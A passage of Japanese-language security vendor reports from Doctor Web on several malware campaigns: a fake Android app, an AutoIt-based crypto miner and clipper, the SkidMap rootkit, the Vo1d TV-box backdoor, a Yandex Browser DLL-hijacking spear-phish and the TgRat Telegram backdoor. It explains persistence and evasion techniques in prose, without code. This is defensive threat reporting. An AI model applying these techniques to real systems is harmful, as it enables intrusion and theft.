このデータには、メインインターフェースの前面に表示されるウィンドウ内にトロイの木馬がWebViewで開くリンクが含まれています。このリンクから一連の長いリダイレクトチェーンが発生し、最終的にオンラインカジノのサイトが開きます。こうして、 Android.FakeApp.1669 はGoogle Play上のアプリのページに記載されている機能を実行する代わりに、サイトのコンテンツを表示するWebアプリケーションとして動作するようになります。

うたわれた機能を提供する代わりにオンラインカジノのサイトを表示させるマルウェア

一方で、トロイの木馬のインターネット接続が特定のサービスプロバイダ経由で実行されていない場合(またはオフラインの場合)には、実際にうたわれたアプリとして動作します。ただし、これはその亜種の作成者がそのような場合に備えて機能を組み込んでいた場合に限られます。

C&Cサーバーから設定を受け取らず、普通のアプリとして起動したトロイの木馬

Dr.Web Security Space for mobile devicesは、 Android.FakeApp.1669 の既知の亜種をすべて検出して駆除します。したがって、Dr.Webのユーザーに危害が及ぶことはありません。

Indicators of compromise(侵害の痕跡) ※英語

Android.FakeApp.1669の詳細 ※英語

仮想通貨の密かなマイニング・窃盗キャンペーンが2万8000人を超えるユーザーを襲う

Wed, 09 Oct 2024 12:11:00 GMT

2024年10月9日

株式会社Doctor Web Pacific

Doctor Webのウイルスアナリストは、仮想通貨のマイニングと窃盗を行うマルウェアを拡散させる大規模なキャンペーンを確認しました。このキャンペーンでは、オフィスプログラムやゲームチャット、オンライントレードボットを装ってユーザーのコンピューターにトロイの木馬を侵入させています。

ユーザーから提供されたクラウドテレメトリの定期的な分析を行う過程で、Doctor WebウイルスラボのスペシャリストによってWindowsコンポーネント(StartMenuExperienceHost.exe、同じ名前を持つ正規のプロセスはスタートメニューを管理するものです)に偽装したプログラムの疑わしいアクティビティが検出されました。このプログラムはリモートネットワークホストと通信し、コマンドラインインタープリタcmd.exeを直ちに起動させるための着信接続を待ちます。

システムコンポーネントに偽装していたのはNcatネットワークユーティリティです。その正規の使用目的は、コマンドラインからネットワーク経由でデータを転送するというものです。この発見により、Dr.Webによって未然に防がれた、コンピューターをマルウェアに感染させようという試みを含むセキュリティイベントの一連の流れを再現することが可能となりました。

感染源は攻撃者によってGitHub上に作成された不正なWebページ(これはGitHubのルールで禁止されています)や動画の下にマルウェアを含んだリンクが記載されたYoutubeページです。ユーザーがリンクをクリックするとパスワード保護された自己解凍型アーカイブがダウンロードされます。アーカイブは暗号化されているため、アンチウイルスソフトウェアによって自動的にはスキャンされません。ダウンロードページ上でハッカーによって提供されるパスワードを入力すると、次の一時ファイルがコンピューター上の %ALLUSERSPROFILE%\jedist フォルダ内に展開されます。

UnRar.exe - RARアーカイブを解凍するアプリケーション
WaR.rar - RARアーカイブ
Iun.bat - Uun.batスクリプトを実行するタスクを作成し、コンピューターの再起動を開始して、自身を削除するスクリプト
Uun.bat - WaR.rarを解凍してそこに含まれるShellExt.dllファイルとUTShellExt.dllファイルを実行し、Iun.batによって作成されたタスクとjedistフォルダをそのコンテンツごと削除する難読化されたスクリプト

ShellExt.dllファイルはAutoIt言語インタープリタで、それ自体は悪意のあるものではありません。しかしながら、これは本物のファイル名ではありません。攻撃者はアーカイバ機能をWindowsの右クリックメニューに組み込むためのWinRARライブラリに偽装させるために、ファイル名をAutoIt3.exeからShellExt.dllに変えています。起動されると、インタープリタはUTShellExt.dllファイルをロードします。このファイルはUninstall Toolユーティリティのものであり、それ自体は完全に正規のもので有効なデジタル署名も持っていますが、攻撃者はこれに悪意のあるAutoItスクリプトを追加しています。このスクリプトは実行されると、高度に難読化された複数のファイルを含んだ自身のペイロードを解凍します。

AutoItはWindows操作を自動化するスクリプトとユーティリティを作成するためのプログラミング言語です。その使いやすさと幅広い機能によりさまざまなカテゴリーのユーザーに人気がありますが、その中にはマルウェア作成者も含まれています。一部のアンチウイルスプログラムはコンパイルされたAutoItスクリプトをすべて悪意のあるものとして検出します。

UTShellExt.dllファイルは次の動作を実行します。

プロセスリストをスキャンして、実行中のデバッグソフトウェアを検索します。スクリプトには約50の異なるデバッグユーティリティの名前が含まれており、このリストに含まれているプロセスが1つでも検出された場合、スクリプトは終了します。
デバッグソフトウェアが検出されなかった場合、攻撃を続行するために必要なファイルが侵害されたシステム上で展開されます。一部のファイルはネットワーク通信を実行するために必要な「クリーン」なファイルですが、残りのファイルは悪意のある動作を実行します。
Ncatを使用したネットワークアクセスを取得してBATおよびDLL ファイルを実行するためのシステムイベントを作成します。IFEOテクニックを使用してレジストリを改変することで、システム上に長く居座ることができるようにします。
Image File Execution Options(IFEO : イメージファイル実行オプション)はWindowsがソフトウェア開発者向けに提供している機能で、アプリケーション起動時に自動的にデバッガを起動させることを可能にするものです。一方で、システム上での足がかりを得るためにこのIFEOテクニックが攻撃者によって悪用される場合があります。その際、攻撃者はデバッガへのパスを悪意のあるファイルへのパスに置き換え、正規のアプリケーションが起動されるたびに悪意のあるアプリケーションも同時に起動するようにします。今回のケースでは、ハッカーはWindowsサービス、ならびにGoogle ChromeとMicrosoft Edgeの更新プロセス(MoUsoCoreWorker.exe、svchost.exe、TrustedInstaller.exe、GoogleUpdate.exe、MicrosoftEdgeUpdate.exe)を「ハイジャック」していました。
手順2で作成したフォルダとファイルを削除・変更する権限を取り消します。
Windowsリカバリーサービスを無効にします。
侵害したコンピューターの仕様や名前、OSバージョン、インストールされているアンチウイルスに関する情報を、Telegramボットを使用して攻撃者に送信します。

仮想通貨の密かなマイニングと窃盗はそれぞれDeviceId.dllファイルと7zxa.dllファイルによって実行されます。いずれのファイルもプロセスハロウイング(Process Hollowing)手法を用いてそれぞれのペイロードをexplorer.exe(Windows Explorer)プロセス内に挿入します。DeviceId.dllファイルは.NETフレームワークの一部として提供される正規のライブラリですが、 SilentCryptoMiner マイナーを実行する悪意のあるAutoItスクリプトが埋め込まれています。このマイナーは多様な構成と密かに仮想通貨をマイニングする機能に加え、リモートコントロール機能も備えています。

7zxa.dllライブラリはアーカイバ7-Zipの正規のライブラリですが、クリッパーが含まれています。この種のマルウェアはクリップボード内のデータを監視する目的で使用され、それらのデータを置き換えたり攻撃者に送信したりすることができます。今回のケースでは、クリッパーはウォレットアドレスであることを示す文字列が入力されるのを待ち、それらのアドレスを攻撃者の指定したアドレスに置き換えます。本記事掲載時点で、このクリッパーによって6000ドル相当を超える仮想通貨が盗まれています。

プロセスハロウイング手法は、正規プロセスをサスペンド(一時停止)状態で起動させ、そのメモリ内のコードを悪意のあるコードで上書きしたのちに、プロセス実行を再開させるというものです。その結果として、同じ名前を持つ複数のプロセスのコピーが存在することになります。今回のケースでは、ユーザーのシステム上で3つのexplorer.exeプロセスが確認されました。通常このプロセスは1つのコピーしか存在しないため、このこと自体が疑わしい兆候となります。

このマルウェアキャンペーンにより、合計で2万8000人を超えるユーザーが被害を受けています。その多くがロシア国民となっており、そのほかベラルーシ、ウズベキスタン、カザフスタン、ウクライナ、キルギスタン、トルコでも多数の感染が確認されています。今回のケースでは、ユーザーのコンピューターはポピュラーなプログラムの海賊版をインストールすることで侵害されています。したがって、このようなインシデントを防ぐための推奨事項として、ソフトウェアは公式サイトからダウンロードする、オープンソースの代替品を使用する、高性能なアンチウイルスソフトウェアをインストールするといったことが挙げられます。Dr.Webユーザーは確実に保護されており、この脅威による被害を受けることはありません。

Trojan.AutoIt.1443の詳細 ※英語

Indicators of compromise(侵害の痕跡) ※英語

Redisハニーポット : 脆弱なRedisデータベースを使用するサーバーで、仮想通貨のマイニングプロセスを隠すSkidMapの新たな亜種を発見

Fri, 04 Oct 2024 11:05:16 GMT

2024年10月4日

株式会社Doctor Web Pacific

Doctor Webのウイルスアナリストは、侵害したLinuxマシン上にマイニング型トロイの木馬Skidmapをインストールするルートキットの新たな亜種を発見しました。このルートキットは、CPU使用率とネットワークアクティビティに関する偽の情報をユーザーに対して提供することで仮想通貨のマイニング活動を隠す、悪意のあるカーネルモジュールとして設計されています。この攻撃は、大規模なサーバーとクラウド環境を備えた(すなわちマイニングの効率が最も高い)企業を主な標的として、無差別に行われているものとみられます。

データベース管理システムRedisは世界で最もポピュラーなNoSQLデータベースであり、Redisサーバーは X(旧Twitter)、AirBnB、Amazonなどの大企業で使用されています。その利点は明らかで、極めて高速なパフォーマンス、小さなメモリフットプリント、さまざまなデータタイプとプログラミング言語のサポートが挙げられます。一方で、欠点もあります。Redisはネットワークエッジで使用されることを意図していないため、デフォルト設定では基本的なセキュリティ機能しかサポートしていません。そのため、バージョン6より前のRedisにはアクセス制御や暗号化メカニズムが備わっていません。また、サイバーセキュリティに関する刊行物やレポートでは、毎年Redisの脆弱性が多数報告されています。たとえば、2023年には12件の脆弱性が発見され、そのうち3件は「深刻」であると判定されています。サーバーが侵害されてマイニング型トロイの木馬がインストールされるという事例の報告件数が増えるにつれてDoctor Webウイルスラボの興味をひくところとなり、実際に攻撃を受けてみる運びとなりました。そこで、Doctor Webでは保護されていないRedisサーバーを設置して招かれざる客を待ち受けました。サーバーは1年間稼働しており、その間に毎月約10,000～14,000件の攻撃を受けました。そして先ごろ、Doctor Webアナリストの予期していたとおり、このRedisサーバーに対するトロイの木馬SkidMapの亜種による攻撃が確認されました。予想外だったのは、マイニング活動を隠すための新たな手法が用いられていたということと、同時に4つのバックドアがインストールされていたということです。

トロイの木馬Skidmapが初めてニュースになったのは2019年のことでした。このトロイの木馬は特化されており、企業ネットワークを主な標的としています。仮想通貨のステルスマイニングによる最も大きな利益を見込めるのは、企業を攻撃した時であるためです。登場から5年の月日が経っているにもかかわらず、このトロイの木馬の動作原理は現在も同じままです。すなわち、脆弱性を悪用するか、またはソフトウェア設定の不備を突くことでシステム上にインストールされるというものです。Doctor Webによって設置されたハニーポットサーバーのケースでは、ハッカーはシステムスケジューラにタスクを追加し、スクリプトがドロッパー Linux.MulDrop.142 (または別の亜種である Linux.MulDrop.143 )を10分おきにダウンロードしていました。この実行ファイル(ドロッパー)はOSカーネルバージョンをチェックし、SELinuxセキュリティモジュールを無効にしたうえで、システム上でルートキット Linux.Rootkit.400 、マイナー(マイニング型トロイの木馬) Linux.BtcMine.815 、バックドア Linux.BackDoor.Pam.8/9 と Linux.BackDoor.SSH.425/426 を解凍します。このドロッパーの特異な点は、極めてサイズが大きいということです。あらゆるLinuxディストリビューション用に約60もの実行ファイルがパックされているためです。今回のケースでは、ドロッパーにはサーバーで最も多く使用されているDebianとRed Hat Enterprise Linuxディストリビューションのさまざまなバージョンに対応したファイルが含まれていました。

インストールされたルートキットはシステムコールを傍受し、その結果、管理者によって入力された診断コマンドに対する応答として偽の情報を生成できるようになります。傍受される機能には、平均CPU使用率、複数のポート上でのネットワークアクティビティ、ディレクトリ内のファイルリストなどの報告が含まれています。また、ルートキットはカーネルモジュールがロードされる際にそれらをすべてチェックし、自身を検出できるモジュールが実行されるのを防ぎます。これにより、仮想通貨のマイニングが行われていることを示唆するあらゆるサイン(計算処理、ハッシュの送信、ジョブの受信)を完全に隠すことが可能です。

この攻撃で同じくドロッパーによってインストールされていた4つのバックドアの目的は、侵害されたマシンからSSH認証情報を収集して攻撃者に送信し、システム上のすべてのアカウントに対するマスターパスワードを作成することです。ここで注目したいのは、パスワードはすべて、オフセットが4文字の(4文字ずらす)シーザー暗号を使用してさらに暗号化されているということです。

侵害したシステムの制御をよりしっかりと掌握するために、攻撃者はリモートアクセス型トロイの木馬 Linux.BackDoor.RCTL.2 をインストールしています。これにより、トロイの木馬自身が開始する暗号化された接続を介して、感染したマシンにコマンドを送信したりデータを窃取したりすることが可能になり、ルーティングの問題を回避できます。

xmrigプログラムは、いくつかの仮想通貨をマイニングすることができるマイナーとしてインストールされます。それら仮想通貨の中で最も有名なのが、取引における完全な匿名性によってダークネット上で人気を得ているMoneroです。サーバークラスタ内に潜む、ルートキットによって隠蔽されたマイナーを検出するのは決して容易ではありません。診断データが偽装されている場合、侵害を示唆する兆候は電力消費量と発熱量の増加だけです。ところが、マイニングパフォーマンスとハードウェアパフォーマンス保持との間の最適なバランスをとるようマイナーの設定を調整することで、攻撃者はそれらの兆候すらもほとんど現れないようにすることが可能です。こうして、システムの侵害がユーザーの注意を引かないようにします。

このように、ますます複雑化する攻撃チェーン(起動されたプログラムが相互に呼び出し、セキュリティシステムを無効にし、多数のシステムユーティリティやサービスを妨害し、ルートキットをダウンロードするなど)から、Skidmapマルウェアファミリーの進化がうかがえます。このことが、このようなインシデントへの対応をより一層困難なものにしています。

Indicators of compromise(侵害の痕跡) ※英語

Linux.MulDrop.142の詳細 ※英語

Linux.MulDrop.143の詳細 ※英語

Linux.MulDrop.144の詳細 ※英語

Linux.Rootkit.400の詳細 ※英語

Doctor Webリソースへの攻撃を防御、ウイルスデータベースの更新を再開

Wed, 18 Sep 2024 11:23:22 GMT

2024年9月18日

株式会社Doctor Web Pacific

9月14日土曜日、Doctor Webのリソースに対する標的型攻撃が当社スペシャリストによって確認されました。Doctor Webのインフラストラクチャに危害を加えようとする企ては直ちに阻止され、Dr.Webによって保護されるシステムのユーザーに対する影響はありませんでした。

現在、Doctor Webのセキュリティプロトコルに従って、確認を行うためにすべてのリソースがネットワークから切断されています。それに伴い、Dr.Webウイルスデータベースのリリースを一時的に停止しております。攻撃の影響を診断・排除するためにDr.Web FixIt!サービスの特別なLinux向けプレリリースバージョンが使用されています。これにより、リソースをより迅速にスキャンすることが可能です。ウイルスデータベースのリリースはまもなく再開されます。

※2024年9月18日追記

更新されたウイルスデータベースの配信は、日本時間の9月17日22時過ぎに再開しております。

百万台を超えるAndroid TVボックスを襲うVo1d

Fri, 13 Sep 2024 15:03:04 GMT

2024年9月13日

株式会社Doctor Web Pacific

Doctor Webのエキスパートにより、Android TVボックスの新たな感染事例が発見されました。 Android.Vo1d と名づけられたマルウェアが197か国で130万台近いデバイスを感染させています。この Android.Vo1d はシステムストレージ領域に自身のコンポーネントを置くバックドアで、攻撃者のコマンドに応じてサードパーティソフトウェアを密かにダウンロードしてインストールする機能を備えています。

2024年8月、Doctor Webでは、Dr.Webアンチウイルスによってデバイス上でシステムファイル領域内の変更が検出されたという複数のユーザーから連絡を受けました。変更が検出されたのは以下のモデルです。

モデル	ファームウェバージョン(メーカー発表)
R4	Android 7.1.2; R4 Build/NHG47K
TV BOX	Android 12.1; TV BOX Build/NHG47K
KJ-SMART4KVIP	Android 10.1; KJ-SMART4KVIP Build/NHG47K

これらすべてのケースにおいて同様の感染兆候がみられたため、ここではユーザーから受け取った最初のリクエストのうち1つを例としてとりあげます。侵害されたTVボックス上で、以下のオブジェクトが改変されていました。

install-recovery.sh
daemonsu

さらに、ファイルシステム内に新たなファイルが4つ作成されています。

/system/xbin/vo1d
/system/xbin/wd
/system/bin/debuggerd
/system/bin/debuggerd_real

vo1dファイルとwdファイルは、今回発見されたトロイの木馬 Android.Vo1d のコンポーネントです。

このトロイの木馬の作成者は、そのコンポーネントの1つをシステムプログラムである/system/bin/voldに偽装させようという目的で、「vo1d」という似たような(小文字の「l」を数字の「1」に変えただけの)名前を付けたものと考えられます。この悪意のあるプログラムの名前はこのファイル名からとられています。さらに、この綴りは英語の「void」も連想させます。

install-recovery.shファイルはスクリプトで、ほとんどのAndroidデバイスに存在しています。オペレーティングシステムの起動時に実行され、ファイル内で指定されているエレメントを自動実行するためのデータを含んでいます。マルウェアがroot権限(rootアクセス)を持ち、システムディレクトリ/systemに書き込むことができる場合、自身をこのスクリプト内に追加することで(または、スクリプトがシステム内にない場合は一から作成することで)、感染したデバイス上にとどまるための足がかりを得ることができます。 Android.Vo1d は、このファイル内にwdコンポーネントの自動実行を登録していました。

改変されたinstall-recovery.shファイル

daemonsuファイルはrootアクセスを持つ多くのAndroidデバイスに存在しています。オペレーティングシステムによってその起動時に実行され、ユーザーにroot権限を付与する役割を担っています。 Android.Vo1d はこのファイル内にも自身を登録し、さらにwdコンポーネントの自動実行も設定しています。

debuggerdファイルは、通常は発生したエラーに関するレポートの作成に使用されるデーモンですが、TVボックスの感染によって、wdコンポーネントを起動するスクリプトに置き換えられていました。

今回のケースでは、debuggerd_realファイルが本物のdebuggerdファイルに置き換わるためのスクリプトのコピーです。トロイの木馬の作成者は、本物のdebuggerdファイルをdebuggerd_real内に移動させることで、その機能を保持しようとしたものとみられます。しかしながら、恐らくは感染が2回起こったために、トロイの木馬が移動させたファイルは1回目の感染ですでに置き換えられていたファイル(すなわち、スクリプト)であり、その結果、デバイスにはトロイの木馬のスクリプトが2つ存在することになり、本物のプログラムファイルdebuggerdは1つも残っていませんでした。

他のユーザーの感染したデバイスでは、発見されたファイルに若干の違いがありました。

daemonsu (vo1dファイルと同じ： Android.Vo1d.1 )
wd ( Android.Vo1d.3 )
debuggerd (上記と同じスクリプト)
debuggerd_real (debuggerdツールの元のファイル)
install-recovery.sh (指定されたオブジェクトをロードするスクリプト)

上記すべてのファイルを分析した結果から、トロイの木馬の作成者は Android.Vo1d をシステム内にとどめるために少なくとも3つの異なる手法を用いていることが分かります。すなわち、install-recovery.shファイルとdaemonsuファイルの改変、debuggerdプログラムの置き換えです。感染させたシステム内にこれらファイルのいずれか1つでも存在することを期待しているものと考えられます。これらファイルの1つだけにでも手を加えることができれば、デバイスの再起動時にトロイの木馬を確実に自動実行させることが可能になるからです。

Android.Vo1d の主要機能は連携して動作するコンポーネントvo1d( Android.Vo1d.1 )とwd( Android.Vo1d.3 )に隠されています。 Android.Vo1d.1 モジュールは Android.Vo1d.3 の起動を担い、その動作をコントロールし、必要に応じてそのプロセスを再起動させます。また、C&Cサーバーから受け取るコマンドに応じて実行ファイルをダウンロードして実行することができます。一方、 Android.Vo1d.3 モジュールはその本体に暗号化された状態で格納されている Android.Vo1d.5 デーモンをデバイス上にインストールして起動します。このモジュールも実行ファイルをダウンロードして実行することができるほか、指定されたディレクトリを監視して、そこで見つかったAPKファイルをインストールします。

Doctor Webのマルウェアアナリストによる調査の結果、バックドア Android.Vo1d はおよそ130万台のデバイスを感染させており、その地理的範囲は200か国近くに及んでいることが明らかになりました。最も感染数の多かった国は、ブラジル、モロッコ、パキスタン、サウジアラビア、ロシア、アルゼンチン、エクアドル、チュニジア、マレーシア、アルジェリア、インドネシアとなっています。

感染したデバイスの検出数が最も多かった国

Android.Vo1d を拡散させる攻撃者がその標的として特にTVボックスに白羽の矢を立てた背景には、これらのデバイスには往々にして古いバージョンのAndroidが搭載されているという状況があると考えられます。そのようなバージョンにはパッチの適用されていない脆弱性が存在し、アップデートのサポートも終了しています。たとえば今回のケースでは、ユーザーはAndroid 7.1を搭載するモデルを使用していました。それらの中には、Android 10やAndroid 12などの新しいバージョンが搭載されているとうたわれているものもあります。残念ながら、安価なデバイスのメーカーが古いバージョンのOSを搭載しておきながら、それらを最新のバージョンと偽って売り込もうとすることは珍しくありません。

また、TVボックスはスマートフォンに比べて安全なデバイスであるという誤った認識をユーザー自身が抱いてしまっている場合もあります。そのため、TVボックスにはアンチウイルスソフトウェアをインストールしてあることが少なく、サードパーティアプリをダウンロードする際や非公式ファームウェアをインストールする際にマルウェアに遭遇するリスクが高くなります。

現時点では、TVボックスがバックドアに感染した経路については明らかになっていません。可能性として考えられるのは、オペレーティングシステムの脆弱性を悪用してroot権限を取得する中間マルウェアによる攻撃です。もう1つの可能性としては、root権限を持つ非公式ファームウェアの使用が考えられます。

Android向けDr.Webアンチウイルス製品はトロイの木馬 Android.Vo1d の既知の亜種すべてを検出し、root権限を使用できる場合は感染したデバイスを修復します。

Indicators of compromise (侵害の痕跡) ※英語

Android.Vo1d.1の詳細 ※英語

Android.Vo1d.3の詳細 ※英語

Android.Vo1d.5の詳細 ※英語

Yandex Browserを悪用してシステム上に居座る：未然に防がれたロシアの鉄道貨物輸送業者に対するスピアフィッシング攻撃

Thu, 05 Sep 2024 12:13:30 GMT

2024年9月5日

株式会社Doctor Web Pacific

ソーシャルエンジニアリングは、対抗することが難しい極めて効果の高い詐欺手法です。巧みな攻撃者は、被害者を脅したり説得したりして望み通りの行動をとらせるための効果的なアプローチを、どのように探ればよいか分かっています。しかし、攻撃にほとんどコミュニケーションを必要とせず、ユーザーのコンピューターがデジタルアシスタントであることをやめて意図せず共犯者となってしまったら？

スピアフィッシングは大規模な組織のコンピューターにマルウェアを侵入させるために広く用いられている手法です。通常のフィッシングと異なるのは、攻撃者が事前に情報を収集して、セキュリティ侵害につながるような行動をとらせるよう誘導するメッセージを標的となる受信者（被害者）に合わせてパーソナライズしているという点です。主に標的とされるのは、重要な情報にアクセスできる上層部の従業員や、複数の相手とやりとりをする部門の従業員です。特に、あらゆる形式の添付ファイルを含んだメールを見知らぬ人物から大量に受け取る人事部の従業員がこれに当てはまります。そしてこの攻撃ベクトルこそ、今回の事例で脅威アクターによって用いられていたものでした。

2024年3月、Doctor Webはロシアの大手鉄道貨物輸送業者から連絡を受けました。添付ファイルを含んだ不審なメールが情報セキュリティ部門の目に留まり、そのファイルの危険性を確認しようと試みた後、Doctor Webのスペシャリストに依頼したというものでした。Doctor Webのアナリストによる調査の結果、同企業はあと一歩でスピアフィッシングの被害者になるところであったということが判明しました。攻撃者の目的はシステム情報を収集し、侵害したコンピューター上でモジュラー型マルウェアを起動させることでした。

この攻撃を実行するにあたって、攻撃者は求職者からの履歴書送付を装ったフィッシングメールを企業のメールアドレス宛に送信しています。メールには応募書類のPDFファイルが格納されているとするアーカイブが添付されており、このファイルには「.pdf.lnk」といういわゆる「二重」拡張子が付いていました。二重拡張子を使用して悪意のあるオブジェクトを隠すというのは、ユーザーを騙すためによく用いられる手段です。Windowsでは、ユーザーにとって煩わしくないようデフォルトで拡張子が表示されないようになっています。ファイルに「二重」拡張子が付いている場合は2つ目の拡張子のみが非表示になります。つまり、今回のケースでは「.lnk」拡張子は表示されず、ユーザーの目に見えていたのは最初の「.pdf」拡張子だけということになります。そのうえ、ファイル名を拡張子まですべて表示する設定が有効になっている場合でも、「.lnk」拡張子は常にOSによって非表示にされます。

lnkファイルを使用してシステムを侵害するという手法は目新しいものではありません。最も目立った攻撃は、2010年に発生したイランの都市ナタンズにあるウラン濃縮施設に対する過去に類を見ないサイバー攻撃です。Stuxnetと呼ばれるワームがガス遠心分離機を制御するPLCを攻撃し、遠心分離機を異常な速度で回転させたのちに突然停止させて破壊したというものです。Stuxnetはこのウラン濃縮施設で機器を破壊するのみにとどまらず、世界中の多くの国で20万台を超えるコンピューターを感染させました。主な攻撃ベクトルはUSBドライブ経由で企業の管理コンピューターに到達したlnkファイルでした。このlnkファイルを含んだフォルダにユーザーが移動するだけで、悪意のあるプログラムが実行されます。攻撃には4つのゼロデイ脆弱性が悪用されており、中でも目を引くのが、ユーザーの介入なしにStuxnet ワームの起動を可能にするCPLINKエクスプロイトです。

lnkファイル内のメタデータ

実際の「.lnk」拡張子は、Windowsでショートカットファイルに付けられる拡張子です。「Target」フィールドでは実行ファイルなどのあらゆるOSオブジェクトへのパスを指定することができ、必要なパラメータでそれを実行することができます。この攻撃ではPowerShellコマンドプロンプトが密かに実行され、攻撃者のWebサイトから2つの悪意のあるスクリプトをダウンロードしていました。そして、これらのスクリプトがそれぞれ独自のペイロードを実行しています。

攻撃チェーン

1つ目のペイロードはおとりのPDFファイルと YandexUpdater.exe という名前の実行ファイルです。この実行ファイルはYandex Browserを更新するためのコンポーネントを装っていますが（本物のコンポーネントの名前は service_update.exe です）、実際は Trojan.Packed2.46324 と呼ばれるマルウェアドロッパーです。 Trojan.Packed2.46324 は、エミュレーション環境で実行されているかどうか、デバッグソフトウェアが存在するかどうかを確認する一連のチェックを行った後、侵害したシステム上で Trojan.Siggen28.53599 を展開します。 Trojan.Siggen28.53599 はリモートコントロール機能を備えており、システム情報を収集し、さまざまな悪意のあるモジュールをダウンロードします。これらの機能に加えて、このトロイの木馬にはアンチデバッグ機能が搭載されています。アンチウイルス、仮想マシン、あるいはデバッガのプロセスを検出した場合は自身のファイルをゼロで上書きし、それが保存されていたフォルダごとファイルを削除します。

おとりのPDFファイル

2つ目のペイロードはおとりのPDFファイルと Trojan.Siggen27.11306 で構成されています。この Trojan.Siggen27.11306 は暗号化されたペイロードを持つ動的ライブラリ（DLL）です。このトロイの木馬の特異な点は、DLL検索順序ハイジャッキング（DLL Search Order Hijacking）を目的にYandex Browserの脆弱性を悪用するということです。Windowsでは、DLLファイルはアプリケーションが関数や変数、インターフェース要素を保存するために使用するライブラリです。アプリケーションは起動されると複数のデータストア内のライブラリを特定の順序で検索します。そこで、攻撃者はDLL検索の優先順位が高いフォルダに悪意のあるライブラリを配置することで、いわば「列に割り込む」形でその悪意のあるDLLが先に見つかるようにします。

DLL検索優先順位の簡易スキーム図

このトロイの木馬は Wldp.dll という名前で隠しフォルダ %LOCALAPPDATA%\Yandex\YandexBrowser\Application に保存されます。これはYandex Browserがインストールされるディレクトリであり、このブラウザが起動時に必要なライブラリを検索するディレクトリです。一方、本物の Wldp.dll ライブラリ（アプリケーションを正常に起動する役割を担っています）はOSのシステムライブラリで、 %WINDIR%\System32 フォルダにあります。悪意のあるライブラリがYandex Browserインストールフォルダに置かれているために、それが最初にロードされます。同時に、この悪意のあるライブラリはメインアプリケーションのすべての権限を取得し、ブラウザに成り代わってコマンドを実行したりプロセスを生成したり、インターネットアクセスのファイアウォールルールを継承したりできるようになります。

ブラウザの起動後、悪意のある Wldp.dll ライブラリはそこに埋め込まれているペイロードを復号化します。ここで注意したいのは、復号化が2回実行されるということです。1回目は悪意のあるDLLが置かれているパスのハッシュから生成されたキーを使用して実行され、2回目はトロイの木馬の本体に埋め込まれたグローバルキーを使用して実行されます。復号化の結果シェルコードが生成され、このシェルコードを実行することで、攻撃者が.NET言語で記述されたアプリケーションを侵害されたシステム上で起動することが可能になります。そして、そのアプリケーションの実行ファイルがネットワークからマルウェアをダウンロードします。残念ながら、調査時点ではダウンローダが通信していたサーバーがダウンしていたため、ここでダウンロードされていたトロイの木馬を特定するには至りませんでした。

以上のことから、今回の事例ではフィッシングメールに添付されたファイルが開かれることで2つの異なるトロイの木馬が侵害されたシステム上に侵入するという、マルチベクトル（複数のベクトル）かつマルチステージ（複数の段階）での感染スキームが用いられていることが分かります。複雑な手口ではありますが、このような攻撃を阻止するために必要な対策はいたってシンプルです。

情報セキュリティに対する従業員の意識を向上させる（リンクやファイル名を注意深くチェックする、疑わしいオブジェクトを開かない）。
メールフィルタリング機能を備えたソフトウェア（例： Dr.Web Mail Security Suite ）を使用することで、悪意のあるメールや添付ファイルの受信を阻止する。
ネットワーク内のすべてのノードにアンチウイルスソフトウェア（例： Dr.Web Desktop Security Suite、 Dr.Web Server Security Suite ）をインストールする。これにより、インターネットの使用中に危険なファイルが侵入することを防ぎ、USBドライブ経由でファイルが侵入してしまった場合でもコンピューター上の疑わしいアクティビティがブロックされます。
プログラムのバグを修正するためのソフトウェアアップデートを定期的に適用する。

Doctor Webは発見されたYandex Browserの脆弱性についてYandex社に報告を行いました。その後、当該脆弱性（ CVE-2024-6473 ）が修正されたYandex Browserの新しいバージョン（24.7.1.380）がYandex社より直ちにリリースされました。

なお、本記事は、攻撃に関する詳細が公表される前にYandex Browserユーザーがパッチの適用されたバージョンへのアップグレードを安全に行うことができるよう、公開日についてYandex社のブラウザ開発者との間で調整を行ったうえで掲載されています。

Indicators of compromise (侵害の痕跡)※英語

「メッセンジャーを撃て（"Do" shoot the messenger）」: Telegramから操作されるバックドア型トロイの木馬がLinuxサーバーを標的に

Fri, 05 Jul 2024 11:36:23 GMT

2024年7月5日

株式会社Doctor Web Pacific

Doctor Webのウイルスアナリストは、コンピューターへの標的型攻撃に使用される悪名高いTgRatトロイの木馬のLinuxバージョンを発見しました。このトロイの木馬の大きな特徴の1つは、Telegramボット経由で操作されるという点です。

このマルウェアは、いささか不愉快ではあるが非常に的を射た略称「RAT」（英語のrat：ネズミ）として知られるリモートアクセス型トロイの木馬（Remote Access Trojan）です。基本的には、RATはCOVIDロックダウン以降なじみ深くなったリモートアクセスツールと同じですが、それを攻撃者が悪用したもので、標的となったユーザーが自分のコンピューターを制御されていることに気が付かないという点が主な違いです。

TgRatトロイの木馬は、元々2022年に初めて発見されたWindows用トロイの木馬で、侵入したコンピューターからデータを盗み出すよう設計されています。そのLinuxバージョンが先ごろDoctor Webのウイルスアナリストによって発見されました。

Doctor Web のウイルスラボにホスティングプロバイダから情報セキュリティインシデントの調査依頼があり、このインシデントを引き起こしていたのがTgRatトロイの木馬のLinuxバージョンであることが明らかになりました。同ホスティングプロバイダのクライアントの1社でDr.Webアンチウイルスによってサーバー上で疑わしいファイルが検出され、このファイルがトロイの木馬ドロッパー（標的となるコンピューターにマルウェアを侵入させるよう設計されたプログラム）でした。このドロッパーはシステム内にトロイの木馬 Linux.BackDoor.TgRat.2 を展開していました。

Linux.BackDoor.TgRat.2 は特定のコンピューターを攻撃するよう設計されています。起動されるとコンピューター名のハッシュとトロイの木馬本体に埋め込まれた文字列を照合し、値が一致しなかった場合、TgRatはそのプロセスを終了します。値が一致した場合はネットワークに接続し、コントロールサーバーと通信を行いますが、そのコントロールサーバーとしてTelegramボットを使用するという一風変わった手法が用いられています。

Telegramは多くの企業で社内コミュニケーション手段として広く利用されているメッセンジャーアプリです。そのため、マルウェアを侵入させて機密情報を盗むためのベクターとして脅威アクターに悪用されるというのは、さして驚くべきことではありません。このプログラムの人気とTelegramサーバーへの定期的なトラフィックが、侵害されたネットワーク上でのマルウェアの格好の隠れ蓑になるからです。

このトロイの木馬はボットが接続されているTelegramのプライベートグループを通じて操作されます。攻撃者はTelegramメッセンジャーを使用してトロイの木馬にコマンドを送ることができます。コマンドを受け取ったトロイの木馬は、侵害されたシステムからファイルをダウンロードする、スクリーンショットを撮る、コマンドをリモートで実行する、ファイルを添付ファイルとしてアップロードするなどの動作を実行します。

